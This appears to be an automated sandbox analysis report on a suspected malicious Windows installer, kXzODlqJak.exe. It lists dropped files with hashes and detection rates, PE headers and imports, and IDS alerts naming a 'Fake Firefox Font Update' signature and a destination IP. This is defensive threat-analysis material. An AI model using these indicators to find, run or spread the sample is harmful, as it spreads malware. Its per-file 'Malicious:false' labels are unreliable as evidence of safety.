                                                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.u.n.d.l.e.E.x.t.e.n.s.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.w.i.x.t.o.o.l.s.e.t...o.r.g./.s.c.h.e.m.a.s./.v.4./.B.u.n.d.l.e.E.x.t.e.n.s.i.o.n.D.a.t.a.". ./.>.
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2598912
                                                                                                                                                                                                                                                                          Entropy (8bit):6.6049974235008655
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                                                                                                                          MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                                                                                                                          SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                                                                                                                          SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                                                                                                                          SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):8581632
                                                                                                                                                                                                                                                                          Entropy (8bit):6.736578346160889
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                                                                                                                          MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                                                                                                                          SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                                                                                                                          SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                                                                                                                          SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1053696
                                                                                                                                                                                                                                                                          Entropy (8bit):6.539052666912709
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                                                                                                                          MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                                                                                                                          SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                                                                                                                          SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                                                                                                                          SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):356352
                                                                                                                                                                                                                                                                          Entropy (8bit):6.447802510709224
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                                                                                                                          MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                                                                                                                          SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                                                                                                                          SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                                                                                                                          SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):6487736
                                                                                                                                                                                                                                                                          Entropy (8bit):7.518089126573906
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                                                                                                                          MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                                                                                                                          SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                                                                                                                          SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                                                                                                                          SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):664064
                                                                                                                                                                                                                                                                          Entropy (8bit):6.953961612144461
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                                                                                                                          MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                                                                                                                          SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                                                                                                                          SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                                                                                                                          SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60283
                                                                                                                                                                                                                                                                          Entropy (8bit):4.569551839311306
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                                                                                                                          MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                                                                                                                          SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                                                                                                                          SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                                                                                                                          SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):421200
                                                                                                                                                                                                                                                                          Entropy (8bit):6.59808962341698
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                                                                                                                          MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                                                                                                                          SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                                                                                                                          SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                                                                                                                          SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):770384
                                                                                                                                                                                                                                                                          Entropy (8bit):6.908020029901359
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                                                                                                                          MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                                                                                                                          SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                                                                                                                          SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                                                                                                                          SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4485813
                                                                                                                                                                                                                                                                          Entropy (8bit):7.960501110953352
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:zvf5BQTYhbOg6IdJogvR31mRCbJ2O4qm08UhFdFtZ7C5Bd6wKWgSKNKk8R:zvhy2cW31mRCbEqf8UhFiBdQ+kO
                                                                                                                                                                                                                                                                          MD5:B56FE6EA5F9CAFB0C73A95A3377C8CA1
                                                                                                                                                                                                                                                                          SHA1:252F48E39D28A5554152F32F23A406E4E9E752DD
                                                                                                                                                                                                                                                                          SHA-256:04C5B808B740AC5F17B12956AD0D1B2C21EA1D6A6011275AC2A0D08B454EDB6A
                                                                                                                                                                                                                                                                          SHA-512:1A094CD5029F1D2BD0E804EC7F1911CF25CE319BEF3EB03BC57DF09A5BCF5957C813F9F7FF57B936F0596E0E00F3B447E2E2C3B5BAE9F3AD99BEB63C441DC0D7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):14302064
                                                                                                                                                                                                                                                                          Entropy (8bit):7.991632876953663
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:393216:naTis2twlNkiqrp/dKXKdt08/dEy0z+Zm1X8SN3y0rJEMlw:naTutwjk93KXHaZ06Zm1MSN3jw
                                                                                                                                                                                                                                                                          MD5:2C6652F7E01283DE091B5200B7878E69
                                                                                                                                                                                                                                                                          SHA1:C7503315A496A65C28E4BE9FB397FFB830C54F8F
                                                                                                                                                                                                                                                                          SHA-256:C1E1F6EB7AC42447F53711EAE48AF5B53FB6D75C9CE43CF7E4EDC413CCFB36F4
                                                                                                                                                                                                                                                                          SHA-512:896B0BBD6E8F9E64472589A92C52537FC0140D9E05856A8E2578734E6C0D3D5D57562A63598FCB6E5A20CEA153C74884505D25E2971061DDA45C82F30C3B23AF
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Gc..............Hz......Hz.....L~......L~......L~..(...k..W...Hz......Hz......Hz..........^....~.......~,.......D......~......Rich............................PE..L....p-d..............."............Pj............@.......................................@.................................H............N...................P..h_..`...T...............................@....................... ....................text...9........................... ..`.rdata..L...........................@..@.data...............................@....didat..............................@....wixburn0...........................@..@.rsrc....N.......P..................@..@.reloc..h_...P...`..................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Entropy (8bit):7.991646972369456
                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                          File name:kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File size:14'323'584 bytes
                                                                                                                                                                                                                                                                          MD5:ab79eafcce0d6eff856b259977e480e1
                                                                                                                                                                                                                                                                          SHA1:736603a24e9b143a644c1fe3673c7ac7fbeee37c
                                                                                                                                                                                                                                                                          SHA256:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075
                                                                                                                                                                                                                                                                          SHA512:1aaaffb13ac1d9d400c3409ab00398fca33c1e118e4e9f8f6e1c4534f632693086d5f2525930b92473fb784551d4853679ea1cf7e395ab6dd7dfb138e6957f07
                                                                                                                                                                                                                                                                          SSDEEP:393216:naTis2twlNkiqrp/dKXKdt08/dEy0z+Zm1X8SN3y0rJEMl7:naTutwjk93KXHaZ06Zm1MSN3j7
                                                                                                                                                                                                                                                                          TLSH:CCE63331A1A2303FE6F52DB3B92496343D6CB2181B5486FEC6D0E84D38689D56EF7346
                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Gc..............Hz......Hz......L~......L~......L~..(....k..W...Hz......Hz......Hz..........^....~.......~,.......D......~.....
                                                                                                                                                                                                                                                                          Icon Hash:2d2e3797b32b2b99
                                                                                                                                                                                                                                                                          Entrypoint:0x446a50
                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                          Time Stamp:0x642D70FB [Wed Apr 5 13:00:43 2023 UTC]
                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                          Import Hash:657e40fb09b2c5e277b865a7cf2b8089
                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                          call 00007F50807F92A8h
                                                                                                                                                                                                                                                                          jmp 00007F50807F8C9Dh
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          retn 0000h
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9a748 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa0000 | 0x4efc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0x5f68 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x99560 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x995c0 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x991e0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x6e000 | 0x3f8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x9a2a4 | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6c139 | 0x6c200 | 92efecf5cfa9e863e69713e8451295eb | False | 0.5022376264450867 | data | 6.489848341668886 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x6e000 | 0x2de4c | 0x2e000 | c796b8ce19f947fe45f2a6998482442b | False | 0.27885636039402173 | data | 5.073579231118804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9c000 | 0x1790 | 0xa00 | 0d375a46a1b65b20341c234446129bcf | False | 0.18828125 | firmware 2005 v9319 (revision 0) \277E V2, 0 bytes or less, at 0 0 bytes , at 0 0 bytes | 2.357689911760452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x9e000 | 0xcc | 0x200 | 00535babd2373dd0ad324ceba5e2fc7b | False | 0.263671875 | data | 1.7948113869126585 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wixburn | 0x9f000 | 0x30 | 0x200 | ab5f7325b234bacb71b5d58f9a9ff40e | False | 0.10546875 | data | 0.5556939563611969 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xa0000 | 0x4efc | 0x5000 | 66e987baf579d3084984000d74768671 | False | 0.3189453125 | data | 5.418748157498877 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0x5f68 | 0x6000 | bf2489eda548104ef6d2ce4e15cf676f | False | 0.7933349609375 | data | 6.795414107251252 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xa01c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.43185920577617326
RT_RCDATA | 0xa0a68 | 0x8 | data | English | United States | 1.75
RT_MESSAGETABLE | 0xa0a70 | 0x3d74 | data | English | United States | 0.282418001525553
RT_GROUP_ICON | 0xa47e4 | 0x14 | data | English | United States | 1.15
RT_VERSION | 0xa47f8 | 0x2c8 | data | English | United States | 0.4705056179775281
RT_MANIFEST | 0xa4ac0 | 0x43c | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1081), with no line terminators | English | United States | 0.5027675276752768

DLL | Import
KERNEL32.dll | GetUserDefaultUILanguage, GetUserDefaultLangID, GetSystemDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, CreateProcessW, DuplicateHandle, FreeLibrary, ProcessIdToSessionId, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, OpenProcess, GetProcessId, SetProcessShutdownParameters, LocalFileTimeToFileTime, SetEndOfFile, SetFileTime, GetExitCodeThread, DosDateTimeToFileTime, CompareStringA, SetThreadExecutionState, ReleaseSemaphore, CreateMutexW, GetExitCodeProcess, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, GetStdHandle, ExitProcess, GetModuleHandleExW, VerifyVersionInfoW, GetFileType, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileSizeEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, DecodePointer, WriteConsoleW, GetComputerNameW, GetSystemTime, VerSetConditionMask, CompareStringW, GetNativeSystemInfo, CreateThread, GetCurrentProcess, CreateSemaphoreW, CreateEventW, ReleaseMutex, ResetEvent, SetEvent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, MoveFileExW, SetFileAttributesW, RemoveDirectoryW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, GetCurrentDirectoryW, ExpandEnvironmentStringsW, GetProcessHeap, HeapSize, HeapFree, GetDateFormatW, HeapReAlloc, HeapAlloc, GetModuleFileNameW, GetSystemWow64DirectoryW, GetSystemDirectoryW, GetLocalTime, Sleep, SetLastError, GetTempPathW, GetVolumePathNameW, GetTempFileNameW, GetFullPathNameW, CreateDirectoryW, LCMapStringW, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, FormatMessageW, LocalFree, LoadLibraryExW, GetProcAddress, GetModuleHandleW, WaitForMultipleObjects, WaitForSingleObject, HeapSetInformation, GetLastError, lstrlenA, GetCurrentProcessId, GetModuleHandleA, MulDiv, CompareStringOrdinal, GetSystemWindowsDirectoryW, GlobalAlloc, GlobalFree, CopyFileW, LoadResource, LockResource, SizeofResource, FindResourceExA, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, SystemTimeToFileTime, GetTimeZoneInformation, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, WriteFile, SetFilePointer, CreateFileA, CloseHandle, CreateFileW
USER32.dll | ReleaseDC, MonitorFromPoint, MonitorFromWindow, GetDC, GetMonitorInfoW, ShowWindow, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, SetWindowPos, CreateWindowExW, UnregisterClassW, RegisterClassW, PostQuitMessage, DefWindowProcW, DispatchMessageW, TranslateMessage, GetMessageW, WaitForInputIdle, IsWindow, PostMessageW
GDI32.dll | SelectObject, StretchBlt, GetObjectW, DeleteObject, DeleteDC, GetDeviceCaps, CreateCompatibleDC, CreateDCW
ADVAPI32.dll | CryptHashData, CryptDestroyHash, CryptReleaseContext, OpenProcessToken, AllocateAndInitializeSid, CheckTokenMembership, GetTokenInformation, AdjustTokenPrivileges, IsWellKnownSid, LookupPrivilegeValueW, CryptCreateHash, RegCreateKeyExW, RegDeleteKeyW, RegEnumKeyExW, RegEnumValueW, RegSetValueExW, CryptGetHashParam, QueryServiceStatus, OpenServiceW, OpenSCManagerW, ControlService, CloseServiceHandle, ChangeServiceConfigW, SetEntriesInAclW, DecryptFileW, InitializeAcl, CreateWellKnownSid, ConvertStringSecurityDescriptorToSecurityDescriptorW, ReportEventW, OpenEventLogW, CloseEventLog, RegQueryInfoKeyW, RegDeleteValueW, RegQueryValueExW, GetUserNameW, InitiateSystemShutdownExW, RegOpenKeyExW, RegCloseKey, QueryServiceConfigW, SetNamedSecurityInfoW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetEntriesInAclA, CryptAcquireContextW
                                                                                                                                                                                                                                                                          ole32.dllCoInitializeEx, CoInitialize, CoInitializeSecurity, CoUninitialize, CLSIDFromProgID, CoTaskMemFree, StringFromGUID2, CoCreateInstance
                                                                                                                                                                                                                                                                          OLEAUT32.dllVariantInit, SysAllocString, VariantClear, SysFreeString
                                                                                                                                                                                                                                                                          RPCRT4.dllUuidCreate
                                                                                                                                                                                                                                                                          SHELL32.dllSHGetFolderPathW, CommandLineToArgvW, ShellExecuteExW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-09T14:55:26.263610+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49712 | 104.21.80.52 | 443 | TCP
2025-01-09T14:55:27.755836+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49714 | 104.21.80.52 | 443 | TCP
